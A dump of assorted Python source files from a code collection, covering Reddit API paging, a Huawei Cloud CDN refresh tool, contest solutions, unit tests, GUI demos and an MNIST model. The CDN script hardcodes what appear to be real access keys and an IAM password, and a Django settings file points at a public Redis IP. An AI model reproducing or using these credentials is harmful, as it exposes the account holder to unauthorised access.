+{"seq_id":"472265953","text":"#!/usr/bin/python3\n\"\"\" save all hot post titles into hot_list \"\"\"\nimport requests\n\n\ndef recurse(subreddit, hot_list=[], after=None):\n    try:\n        res = requests.get(\"https://www.reddit.com/r/{}/hot.json?limit=100&after={}\".format(subreddit, after),\n                           headers={'User-agent': 'reddit api calls'},\n                           allow_redirects=False)\n        if (res.json().get(\"data\") is None):\n            return None\n        childrenlist = res.json().get(\"data\").get(\"children\")\n        if ((res.json().get(\"data\").get(\"after\")) is None):\n            return hot_list\n        for i in range(0, len(childrenlist)):\n            hot_list.append(childrenlist[i].get('data').get('title'))\n        afterkey = res.json().get(\"data\").get(\"after\")\n        return recurse(subreddit, hot_list, afterkey)\n    except:\n        return None\n","sub_path":"0x18-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"461938921","text":"# -*- coding:utf-8 -*-\n# Copyright 2018 Huawei Technologies Co.,Ltd.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software distributed\n# under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations under the License.\n\n# C:\\Users\\xczx0627\\AppData\\Local\\Programs\\Python\\Python36\\scripts\\pyinstaller -F E:\\MyPython\\huaweicloud\\cdn.py\nimport sys\nimport os\nimport re\nfrom openstack import connection\nos.environ.setdefault('OS_CDN_ENDPOINT_OVERRIDE','https://cdn.myhuaweicloud.com/v1.0/') # CDN API url,example:https://cdn.myhuaweicloud.com/v1.0/\n\n# AKSK Auth=======================\n# projectId = \"xxxxxxxxxxx\" # Project ID of cn-north-1\n# cloud = \"xxxxxxxxxxx\" # cdn use: cloud = \"myhuaweicloud.com\"\n# region = \"xxxxxxxxxxx\" # example: region = \"cn-north-1\"\n# AK = \"xxxxxxxxxxx\"\n# SK = \"xxxxxxxxxxx\"\n# conn = connection.Connection(\n#     project_id=projectId,\n#     cloud=cloud,\n#     region=region,\n#     ak=AK,\n#     sk=SK\n# )\n\n'''\nprojectId = \"cn-north-1\" # Project ID of cn-north-1\ncloud = \"myhuaweicloud.com\" # cdn use: cloud = \"myhuaweicloud.com\"\nregion = \"cn-north-1\" # example: region = \"cn-north-1\"\nAK = \"DRNBEBBCVY30P0FULINB\"\nSK = \"s73VGPC6OaztuO40uKb5DpDsUXFR3RP7PJmcr2wb\"\n\nconn = connection.Connection(\n    project_id=projectId,\n    cloud=cloud,\n    region=region,\n    ak=AK,\n    sk=SK)\n'''\n\n# token ============================\n# Authusername = \"replace-with-your-username\" # user name\n# password = \"replace-with-your-password\" # user password\n# projectId = \"replace-with-your-projectId\" # project ID\n# userDomainId = \"replace-with-your-domainId\" # account ID\n# auth_url = \"https://iam.example.com/v3\" # endpoint url\n# conn = connection.Connection(\n#     auth_url=auth_url,\n#     user_domain_id=userDomainId,\n#     project_id=projectId,\n#     username=username,\n#     password=password\n# )\n\nusername = \"xczxcdnapi\" # IAM User Name\npassword = \"Xczx4VKcW3pFgc\" # IAM User Password\nprojectId = \"099eaa2c6500256c2f24c008eaa09045\" # Project ID of cn-north-1\nuserDomainId = \"092ac987a800f5b80fdac008a9a05080\" # Account ID\nauth_url = \"https://iam.myhuaweicloud.com/v3\" # IAM auth url,example: https://iam.myhuaweicloud.com/v3\nconn = connection.Connection(\n    auth_url=auth_url,\n    user_domain_id=userDomainId,\n    project_id=projectId,\n    username=username,\n    password=password\n    )\n \n# new version API\n# part 3: Refreshing and Preheating\n# Creating a Cache Refreshing Task\ndef refresh_create(_refresh_task):\n    print(\"refresh files or dirs:\")\n    task = conn.cdn.create_refresh_task(**_refresh_task)\n    print(task)\n\n'''\nif __name__ == \"__main__\":\n    # new version API\n    # part 3: Refreshing and Preheating\n    # Creating a Cache Refreshing Task\n    refresh_file_task = {\n        \"type\": \"file\",\n        \"urls\": [\"https://appjs.changsha.cn/front_js/Mypublish.js\",\n                 \"https://appjs.changsha.cn/front_js/Mypublish.js\"]\n    }\n    refresh_dir_task = {\n        \"type\": \"directory\",\n        \"urls\": [\"xxxxxxxxxxx\",\n                 \"xxxxxxxxxxx\"]\n    }\n'''\n# Get a command-line argument by index\ndef GetPara(index):\n    if sys.argv.__len__()>index:\n        para=sys.argv[index];\n    else:\n        para=None;\n    return para;\n\n# Program path\ndef GetPath():\n    path=GetPara(0);\n    if path.rindex(\"\\\\\") > 0:path=path[0:path.rindex(\"\\\\\")+1];\n    if path.rindex(\"/\") > 0:path=path[0:path.rindex(\"/\")+1];\n    return path;\n\n# Regular-expression replace\ndef RegReplace(regstr,repalcestr,searchstr):\n    result= re.sub(regstr,repalcestr,searchstr,0,re.I);\n    return result;\n\n# Get the url list (comma-separated)\ndef GetUrl():\n    urllist=GetPara(2);\n    urlary=[];\n    if not(urllist is None):\n        if urllist!=\"\":\n            urllist=RegReplace(\"\\s*[\\r\\n]+\\s*\",\",\",urllist);\n            urlary=urllist.split(\",\");\n    return urlary;\n\n# Get the refresh type\ntype=GetPara(1);\n\n# Refresh files\nif type==\"file\":\n    url=GetUrl();\n    if url.__len__()>0:\n        refresh_file_task = {\n            \"type\": \"file\",\n            \"urls\": url\n        }\n        refresh_create(refresh_file_task);\n\n# Refresh directories\nif type==\"directory\":\n    url=GetUrl();\n    if url.__len__()>0:\n        refresh_dir_task = {\n            \"type\": \"directory\",\n            \"urls\": url\n        }\n        refresh_create(refresh_dir_task);\n","sub_path":"plugs/cdn/cdn.py","file_name":"cdn.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"492464274","text":"from math import ceil\n\nN, M = map(int, input().split())\nA = list(map(int, input().split()))\n\n# If there are no blue squares, make one stamp of size N and press it once\nif M == 0:\n    print(1)\n    exit(0)\n\nA.sort()\nspace = [0]*(M+1)\nK = 10**9\n\n# Number of white squares before the first blue square\nif A[0] != 1:\n    K = A[0]-1\n    space[0] = A[0]-1\n\nfor i in range(M-1):\n    tmp_mn = A[i+1]-A[i]-1\n    # If 0 (the blue squares are consecutive), do not update\n    if tmp_mn != 0:\n        K = min(K, tmp_mn)\n        space[i+1] = tmp_mn\n\n# Number of white squares from the last blue square to the end\nif A[-1] != N:\n    tmp_mn = N-A[-1]\n    K = min(K, tmp_mn)\n    space[-1] = tmp_mn\n\n# Count how many times the stamp must be pressed\nans = 0\nfor s in space:\n    if s == 0:\n        continue\n\n    ans += ceil(s/K)\nprint(ans)\n","sub_path":"ABC_D/ABC185_D.py","file_name":"ABC185_D.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"651448340","text":"from .base import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\nhosts = os.getenv('ALLOWED_HOSTS', '')\nif hosts:\n    ALLOWED_HOSTS.extend(hosts.split(','))\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.mysql',\n        'CONN_MAX_AGE': 3600,\n        'HOST': os.getenv('MYSQL_HOST', '127.0.0.1'),\n        'NAME': os.getenv('MYSQL_DATABASE', 'ovdb'),\n        'USER': os.getenv('MYSQL_USER', 'root'),\n        'PASSWORD': os.getenv('MYSQL_PASSWORD', ''),\n        'PORT': os.getenv('MYSQL_PORT', '3306'),\n    }\n}\n\nCACHES = {\n    'default': {\n        'BACKEND': 'django_redis.cache.RedisCache',\n        'LOCATION': os.getenv('CACHE_LOCATION', 'redis://35.193.25.247:6379/'),\n        'OPTIONS': {\n            'CLIENT_CLASS': 'django_redis.client.DefaultClient',\n        }\n    }\n}\n","sub_path":"app/config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"56885319","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2013--, scikit-bio development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING.txt, distributed with this software.\n# ----------------------------------------------------------------------------\n\nfrom __future__ import absolute_import, division, print_function\nfrom future.builtins import zip\n\nfrom unittest import TestCase, main\n\nfrom skbio.tree import CompressedTrie, fasta_to_pairlist\nfrom skbio.tree._trie import _CompressedNode\n\n\nclass CompressedNodeTests(TestCase):\n    \"\"\"Tests for the _CompressedNode class\"\"\"\n\n    def setUp(self):\n        \"\"\"Set up test data for use in compressed node unit tests\"\"\"\n        self.key = \"aba\"\n        self.values = [1, 2]\n        self.node = _CompressedNode(self.key, self.values)\n\n    def test_init(self):\n        \"\"\"Node init should construct the right structure\"\"\"\n        # With no values should create a node with an empty list for values,\n        # the provided key as key, and an 
empty dictionary as children\n n = _CompressedNode(self.key)\n self.assertEqual(n.values, [])\n self.assertEqual(n.key, self.key)\n self.assertEqual(n.children, {})\n # With values should create a node with the provided values list as\n # values, the provided key as key, and an empty dictionary as children\n n = _CompressedNode(self.key, self.values)\n self.assertEqual(n.values, self.values)\n self.assertEqual(n.key, self.key)\n self.assertEqual(n.children, {})\n\n def test_truth_value(self):\n \"\"\"Non zero should check for any data on the node\"\"\"\n n = _CompressedNode(\"\")\n self.assertFalse(bool(n))\n self.assertTrue(bool(self.node))\n\n def test_len(self):\n \"\"\"Should return the number of values attached to the node\"\"\"\n self.assertEqual(len(self.node), 2)\n\n def test_size(self):\n \"\"\"Should return the number of nodes attached to the node\"\"\"\n self.assertEqual(self.node.size, 1)\n\n def test_prefix_map(self):\n \"\"\"Should return the prefix map of the node\"\"\"\n exp = {1: [2]}\n self.assertEqual(self.node.prefix_map, exp)\n\n def test_insert(self):\n \"\"\"Correctly inserts a new key in the node\"\"\"\n n = _CompressedNode(self.key, self.values)\n n.insert(\"abb\", [3])\n\n # A new node has been create with the common prefix\n self.assertEqual(n.key, \"ab\")\n self.assertEqual(n.values, [])\n # Tests the old node and the new one has been correctly added\n # as children\n exp_keys = set([\"b\", \"a\"])\n self.assertEqual(set(n.children.keys()), exp_keys)\n # Check that the children have the current values\n self.assertEqual(n.children[\"b\"].key, \"b\")\n self.assertEqual(n.children[\"b\"].values, [[3]])\n self.assertEqual(n.children[\"b\"].children, {})\n\n self.assertEqual(n.children[\"a\"].key, \"a\")\n self.assertEqual(n.children[\"a\"].values, [1, 2])\n self.assertEqual(n.children[\"a\"].children, {})\n\n def test_find(self):\n \"\"\"The key could be found\"\"\"\n # Correctly retrieves the key stored in the calling node\n self.assertEqual(self.node.find(\"aba\"), [1, 2])\n\n # Correctly retrieves the key stored in a node attached to calling one\n n = _CompressedNode(self.key, self.values)\n n.insert(\"abb\", [3])\n self.assertEqual(n.find(\"aba\"), [1, 2])\n self.assertEqual(n.find(\"abb\"), [[3]])\n self.assertEqual(n.find(\"ab\"), [])\n\n # Correctly retrieves an empty list for a non existent key\n self.assertEqual(n.find(\"cd\"), [])\n\n\nclass CompressedTrieTests(TestCase):\n \"\"\"Tests for the CompressedTrie class\"\"\"\n\n def setUp(self):\n \"\"\"Set up test data for use in compressed trie unit tests\"\"\"\n self.data = [(\"ab\", \"0\"),\n (\"abababa\", \"1\"),\n (\"abab\", \"2\"),\n (\"baba\", \"3\"),\n (\"ababaa\", \"4\"),\n (\"a\", \"5\"),\n (\"abababa\", \"6\"),\n (\"bab\", \"7\"),\n (\"babba\", \"8\")]\n self.empty_trie = CompressedTrie()\n self.trie = CompressedTrie(self.data)\n\n def test_init(self):\n \"\"\"Trie init should construct the right structure\"\"\"\n # In no pair_list is provided, it should create an empty Trie\n t = CompressedTrie()\n self.assertEqual(t._root.key, \"\")\n self.assertEqual(t._root.values, [])\n self.assertEqual(t._root.children, {})\n # If a pair_list is provided, it should insert all the data\n t = CompressedTrie(self.data)\n self.assertEqual(t._root.key, \"\")\n self.assertEqual(t._root.values, [])\n self.assertEqual(set(t._root.children.keys()), set([\"a\", \"b\"]))\n\n def test_non_zero(self):\n \"\"\"Non zero should check for any data on the trie\"\"\"\n self.assertFalse(self.empty_trie)\n 
self.assertTrue(self.trie)\n\n def test_len(self):\n \"\"\"Should return the number of values attached to the trie\"\"\"\n self.assertEqual(len(self.empty_trie), 0)\n self.assertEqual(len(self.trie), 9)\n\n def test_size(self):\n \"\"\"Should return the number of nodes attached to the trie\"\"\"\n self.assertEqual(self.empty_trie.size, 1)\n self.assertEqual(self.trie.size, 10)\n\n def test_prefix_map(self):\n \"\"\"Should map prefix to values\"\"\"\n exp1 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"8\": [\"7\"],\n \"3\": [],\n \"4\": []}\n exp2 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"8\": [],\n \"3\": [\"7\"],\n \"4\": []}\n self.assertTrue(self.trie.prefix_map in (exp1, exp2))\n\n def test_insert(self):\n \"\"\"Correctly inserts a new key into the trie\"\"\"\n t = CompressedTrie(self.data)\n t.insert(\"babc\", \"9\")\n self.assertTrue(\"9\" in t.find(\"babc\"))\n\n exp1 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"9\": [\"7\"],\n \"3\": [],\n \"4\": [],\n \"8\": []}\n exp2 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"9\": [],\n \"3\": [\"7\"],\n \"4\": [],\n \"8\": []}\n exp3 = {\"1\": [\"6\", \"2\", \"0\", \"5\"],\n \"9\": [],\n \"3\": [],\n \"4\": [],\n \"8\": [\"7\"]}\n self.assertTrue(t.prefix_map in (exp1, exp2, exp3))\n\n def test_find(self):\n \"\"\"Correctly founds the values present on the trie\"\"\"\n for key, value in self.data:\n self.assertTrue(value in self.trie.find(key))\n self.assertEqual(self.trie.find(\"cac\"), [])\n self.assertEqual(self.trie.find(\"abababa\"), [\"1\", \"6\"])\n\n\nclass FastaToPairlistTests(TestCase):\n \"\"\"Tests for the fasta_to_pairlist function\"\"\"\n\n def setUp(self):\n self.seqs = [(\"sid_0\", \"AC\"),\n (\"sid_1\", \"ACAGTC\"),\n (\"sid_2\", \"ACTA\"),\n (\"sid_3\", \"CAGT\"),\n (\"sid_4\", \"CATGAA\"),\n (\"sid_5\", \"A\"),\n (\"sid_6\", \"CATGTA\"),\n (\"sid_7\", \"CAA\"),\n (\"sid_8\", \"CACCA\")]\n\n def test_fasta_to_pairlist(self):\n \"\"\"Correctly returns a list of (seq, label)\"\"\"\n exp = [(\"AC\", \"sid_0\"),\n (\"ACAGTC\", \"sid_1\"),\n (\"ACTA\", \"sid_2\"),\n (\"CAGT\", \"sid_3\"),\n (\"CATGAA\", \"sid_4\"),\n (\"A\", \"sid_5\"),\n (\"CATGTA\", \"sid_6\"),\n (\"CAA\", \"sid_7\"),\n (\"CACCA\", \"sid_8\")]\n\n for obs, exp in zip(fasta_to_pairlist(self.seqs), exp):\n self.assertEqual(obs, exp)\n\nif __name__ == '__main__':\n main()\n","sub_path":"skbio/tree/tests/test_trie.py","file_name":"test_trie.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"32409005","text":"'''\r\nCreated on 26 may. 2017\r\n\r\n@author: marilola.afonso@ulpgc.com\r\n@organization: MACbioIDi\r\n@version: 0.0 for NAMIC 25th Project Week. 
Summer 2017\r\n'''\r\n\r\nimport tkinter\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport xml.etree.ElementTree as ET\r\nfrom root.nested.language import mdasLiteral\r\n\r\nclass simpleapp_tk(tkinter.Tk):\r\n    def __init__(self,parent):\r\n        tkinter.Tk.__init__(self, parent)\r\n        self.parent = parent\r\n        self.initialize()\r\n\r\n    def initialize(self):\r\n        self.geometry(\"600x300\")\r\n\r\n        # Get Languages\r\n        self.literal = mdasLiteral('module1')\r\n        self.langCode = []\r\n        self.langDescription = []\r\n        for e in self.literal.getLanguages():\r\n            self.langCode.append(e.code) \r\n            self.langDescription.append(e.description)\r\n\r\n        self.comboBox = ttk.Combobox(self)\r\n        if self.literal.getLanguage(self.literal) == 'ar':\r\n            print (\"Combo Ok\")\r\n            self.comboBox.place(x=10,y=10)\r\n        else:\r\n            self.comboBox.place(x=450,y=10)\r\n        self.comboBox.state(['readonly'])\r\n        self.comboBox['values'] = self.langDescription\r\n        self.comboBox.bind(\"<<ComboboxSelected>>\", self.OnOptionSelect)\r\n\r\n        code = self.literal.getLanguage(self.literal)\r\n        i = self.langCode.index(code)\r\n        self.comboBox.current(i)\r\n        #\r\n\r\n        self.entryText = tkinter.StringVar()\r\n        self.entry = tkinter.Entry(self,textvariable=self.entryText, justify='left')\r\n        if self.langCode[i] == 'ar':\r\n            print (\"We are in Arabic\")\r\n            self.entry.place(x=400,y=60)\r\n            self.entry = tkinter.Entry(self,textvariable=self.entryText,justify='right')\r\n        else:\r\n            self.entry.place(x=100,y=60)\r\n            self.entry = tkinter.Entry(self,textvariable=self.entryText, justify='left')\r\n\r\n        self.entry.bind(\"<Return>\", self.OnPressEnter)\r\n        self.entryText.set(self.literal.getLiteral('l_00001'))\r\n\r\n        self.labelText = tkinter.StringVar()\r\n        self.label = tkinter.Label(self,textvariable=self.labelText,anchor=\"w\")\r\n        if self.langCode[i] == 'ar':\r\n            self.label.place(x=550,y=60)\r\n        else:\r\n            self.label.place(x=10,y=60)\r\n\r\n        self.labelText.set(self.literal.getLiteral('l_00002'))\r\n\r\n        self.button = tkinter.Button(self,text=self.literal.getLiteral('l_00003'),command=self.OnButtonClick)\r\n        if self.langCode[i] == 'ar':\r\n            self.button.place(x=100,y=250)\r\n        else:\r\n            self.button.place(x=500,y=250)\r\n\r\n    def OnButtonClick(self):\r\n        print (\"You clicked the button !\")\r\n\r\n    def OnPressEnter(self,event):\r\n        print (\"You pressed enter !\")\r\n        self.labelText.set(self.entryText.get() + \" You pressed enter !\")\r\n\r\n    def OnOptionSelect(self,event):\r\n        print (\"Option selected !\")\r\n        i = self.comboBox.current()\r\n        print (i)\r\n        language = self.langCode[i]\r\n        print (language)\r\n        ''' Combo box '''\r\n        if language == 'ar':\r\n            self.comboBox.place(x=10,y=10)\r\n            self.comboBox.align=\"right\"\r\n        else:\r\n            self.comboBox.place(x=450,y=10)\r\n        ''' Text box ''' \r\n        if language == 'ar':\r\n            print (\"We are in Arabic\")\r\n            self.entry.place(x=400,y=60)\r\n            self.entry = tkinter.Entry(self,textvariable=self.entryText,justify='right')\r\n        else:\r\n            self.entry.place(x=100,y=60)\r\n            self.entry = tkinter.Entry(self,textvariable=self.entryText, justify='left')\r\n\r\n        ''' Label ''' \r\n        if language == 'ar':\r\n            self.label.place(x=550,y=60)\r\n        else:\r\n            self.label.place(x=10,y=60)\r\n        ''' Button ''' \r\n        if language == 'ar':\r\n            self.button.place(x=100,y=250)\r\n        else:\r\n            self.button.place(x=500,y=250) \r\n        \r\n\r\n        doc = ET.parse('../language/module1_' + language + '.xml')\r\n        root = doc.getroot()\r\n        literals = root.find('literals')\r\n\r\n        literal = literals.find('l_00001').text\r\n        print(literal)\r\n        self.labelText.set(literal)\r\n\r\n        literal = 
literals.find('l_00003').text\r\n print(literal)\r\n self.button['text'] = literal\r\n\r\n literal = literals.find('l_00002').text\r\n print(literal)\r\n self.entryText.set(literal)\r\n\r\n self.literal.setLast(language)\r\n \r\n messagebox.showinfo(\"mdasMessage\", \"Changes will take effect at the next reload\") \r\n\r\nif __name__ == \"__main__\":\r\n app = simpleapp_tk(None)\r\n app.title('mdasLiteral')\r\n app.mainloop()","sub_path":"Test_Literal/mdasLiteral.zip_expanded/test/src/root/nested/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"242799721","text":"'''\nFLAG PROJECT\n---------------\nMake your flag 260 pixels tall\nUse the scaling image on the website to determine other dimensions\nThe hexadecimal colors for the official flag are red:#BF0A30 and blue:#002868\nTitle the window, \"The Stars and Stripes\"\nI used a draw_text command and used 20 pt. asterisks for the stars.\nWe will have a competition to see who can make this flag in the least lines of code.\nThe record is 16! You will have to use some loops to achieve this.\n'''\nimport arcade\nredline_y = 250\nstar_y = 230\nstar_x = 15.38\narcade.open_window(494,260,\"The Stars and Stripes\")\narcade.set_background_color((255,255,255))\narcade.start_render()\nfor i in range(7):\n arcade.draw_rectangle_filled(247, redline_y, 494, 20, (191,10,48))\n redline_y -= 40\narcade.draw_rectangle_filled(98.8,190,197.6,140,(0,40,104))\nfor i in range(5):\n for i in range(6):\n arcade.draw_text(\"*\", star_x, star_y, arcade.color.WHITE, 20)\n star_x += 30.76\n star_y -= 28.08\n star_x = 15.38\nstar_y = 215.96\nstar_x = 30.76\nfor i in range(4):\n for i in range(5):\n arcade.draw_text(\"*\", star_x, star_y, arcade.color.WHITE, 20)\n star_x += 30.76\n star_x = 30.76\n star_y -= 28.08\narcade.finish_render()\narcade.run()","sub_path":"7.1_Flag.py","file_name":"7.1_Flag.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"528038049","text":"import os\nimport unittest\nfrom mytardis_ngs_ingestor.mytardis_models import MyTardisParameterSet\n\n\nclass TestingParameterSetModel(MyTardisParameterSet):\n \"\"\"\n :type some_string_field: unicode\n :type a_float_field: float\n \"\"\"\n\n def __init__(self):\n super(TestingParameterSetModel, self).__init__()\n self.some_string_field = None # type: unicode\n self.a_float_field = None # type: float\n\n # Dictionaries to allow reconstitution of the schema for each parameter\n\n # run_id fixture\n self._run_id__attr_schema = {\n u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'name': u'some_string_field',\n u'data_type': 2,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u'',\n u'comparison_type': 1,\n u'full_name': u'A string field',\n u'units': u'', u'order': 9999,\n u'schema': [u'http://www.tardis.edu.au/schema/test']}} # type: dict\n\n # run_number fixture\n self._run_number__attr_schema = {\n u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'name': u'a_float_field',\n u'data_type': 1,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u'',\n u'comparison_type': 1,\n u'full_name': u'A float field',\n u'units': u'',\n u'order': 9999,\n u'schema': [u'http://www.tardis.edu.au/schema/test']}} # type: dict\n\n self._subtype__schema = \"testing-parameter-set\" # type: unicode\n self._model__schema = 
\"tardis_portal.schema\" # type: unicode\n self._name__schema = \"A test parameter set model\" # type: unicode\n self._pk__schema = None # type: NoneType\n self._type__schema = 1 # type: int\n self._hidden__schema = False # type: bool\n self._namespace__schema = \"http://www.tardis.edu.au/schema/test\" # type: unicode\n self._immutable__schema = True # type: bool\n\n\nclass IlluminaParserTestCase(unittest.TestCase):\n def setUp(self):\n self.parameterset_model = TestingParameterSetModel()\n\n def tearDown(self):\n pass\n\n def test__to_schema(self):\n schema_as_dict = self.parameterset_model.to_schema()\n self.assertEqual(schema_as_dict, [\n {'pk': None, 'model': 'tardis_portal.schema',\n 'fields': {'name': 'A test parameter set model',\n 'namespace': 'http://www.tardis.edu.au/schema/test',\n 'subtype': 'testing-parameter-set', 'hidden': False,\n 'type': 1, 'immutable': True}}])\n\n def test__to_parameter_schema(self):\n param_schema_dict = self.parameterset_model.to_parameter_schema()\n self.maxDiff = None\n self.assertDictEqual(param_schema_dict[0],\n {u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'full_name': u'A float field',\n u'comparison_type': 1,\n u'schema': [\n u'http://www.tardis.edu.au/schema/test'],\n u'name': u'a_float_field',\n u'data_type': 1,\n u'units': u'', u'order': 9999,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u''}})\n self.assertDictEqual(param_schema_dict[1],\n {u'pk': None,\n u'model': u'tardis_portal.parametername',\n u'fields': {u'full_name': u'A string field',\n u'comparison_type': 1,\n u'schema': [\n u'http://www.tardis.edu.au/schema/test'],\n u'name': u'some_string_field',\n u'data_type': 2,\n u'units': u'', u'order': 9999,\n u'immutable': True,\n u'is_searchable': True,\n u'choices': u''}})\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"76602747","text":"from __future__ import print_function\r\nimport tensorflow as tf\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\n\r\npath_dir = './testNumber/a/'\r\nf_list = os.listdir(path_dir)\r\nfile_list = [file for file in f_list if file.endswith(\".jpg\")]\r\nfile_list.sort()\r\ntest_images = input_data.read_data_sets(path_dir, one_hot=True)\r\n\r\nkeep_prob = tf.placeholder(tf.float32)\r\nX=tf.placeholder(tf.float32, [None, 784])\r\nY=tf.placeholder(tf.float32, [None, 10])\r\nX_img=tf.reshape(X, [-1, 28, 28, 1])\r\n\r\n# Convolution Layer 1\r\nW1 = tf.Variable(tf.random_normal([3,3,1,32], stddev=0.01))\r\nCL1 = tf.nn.conv2d(X_img, W1, strides=[1,1,1,1], padding='SAME')\r\nCL1 = tf.nn.relu(CL1)\r\n# pooling Layer 1\r\nPL1 = tf.nn.max_pool(CL1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\nPL1 = tf.nn.dropout(PL1, keep_prob=keep_prob)\r\n# Convolution Layer 2\r\nW2 = tf.Variable(tf.random_normal([3,3,32,64], stddev=0.01))\r\nCL2 = tf.nn.conv2d(PL1, W2, strides=[1,1,1,1], padding='SAME')\r\nCL2 = tf.nn.relu(CL2)\r\n# pooling Layer 2\r\nPL2 = tf.nn.max_pool(CL2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\nPL2 = tf.nn.dropout(PL2, keep_prob=keep_prob)\r\n# Convolution Layer 3\r\nW3 = tf.Variable(tf.random_normal([3,3,64, 128], stddev=0.01))\r\nCL3 = tf.nn.conv2d(PL2, W3, strides=[1,1,1,1], padding='SAME')\r\nCL3 = tf.nn.relu(CL3)\r\n# pooling Layer 2\r\nPL3 = tf.nn.max_pool(CL3, 
ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\nPL3 = tf.nn.dropout(PL3, keep_prob=keep_prob)\r\n\r\n# Fully Connected (FC) Layer\r\nL_flat = tf.reshape(PL3, [-1, 4*4*128])\r\nW4 = tf.Variable(tf.random_normal([4*4*128,10], stddev=0.01))\r\nb4 = tf.Variable(tf.random_normal([10]))\r\n\r\n# Model, Cost, Train\r\nmode_LC = tf.matmul(L_flat, W4) + b4\r\nmodel = tf.nn.softmax(mode_LC)\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=mode_LC, labels=Y))\r\n\r\n# Session\r\nwith tf.Session() as sess:\r\n    sess.run(tf.global_variables_initializer())\r\n\r\n    # Load the saved model parameters.\r\n    model_path = \"deep_tmp/model.saved\"\r\n    saver = tf.train.Saver()\r\n\r\n    saver.restore(sess, model_path)\r\n    print(\"Model restored from file: %s\" % model_path)\r\n\r\n    n = len(file_list)\r\n    images = np.zeros((n, 784))\r\n    #prediction = np.zeros((n))\r\n\r\n    i = 0\r\n    for file in file_list:\r\n        fname = path_dir + file\r\n        img = cv2.imread(fname, cv2.IMREAD_GRAYSCALE)\r\n        flatten = img.flatten() / 255.0\r\n        images[i] = flatten\r\n        image = np.reshape(images[i], (1, -1))\r\n        prediction = sess.run(tf.argmax(model, 1), feed_dict={X: image, keep_prob: 0.7})\r\n\r\n        print(prediction)\r\n        cv2.imshow(str(file), img)\r\n\r\n        i += 1\r\n    cv2.waitKey(0)\r\n\r\n    #print(sess.run(tf.argmax(model, 1), feed_dict={X: images}))\r\ncv2.destroyAllWindows()\r\n'''\r\n    cv2.imshow(str(file), img)\r\n    location = (14, 14)\r\n    font = cv2.FONT_HERSHEY_SCRIPT_SIMPLEX\r\n    cv2.putText(img, str(prediction[i]), location, font)\r\n'''\r\n","sub_path":"MNIST_deepCNN_test.py","file_name":"MNIST_deepCNN_test.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"579192567","text":"\"\"\"main_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. 
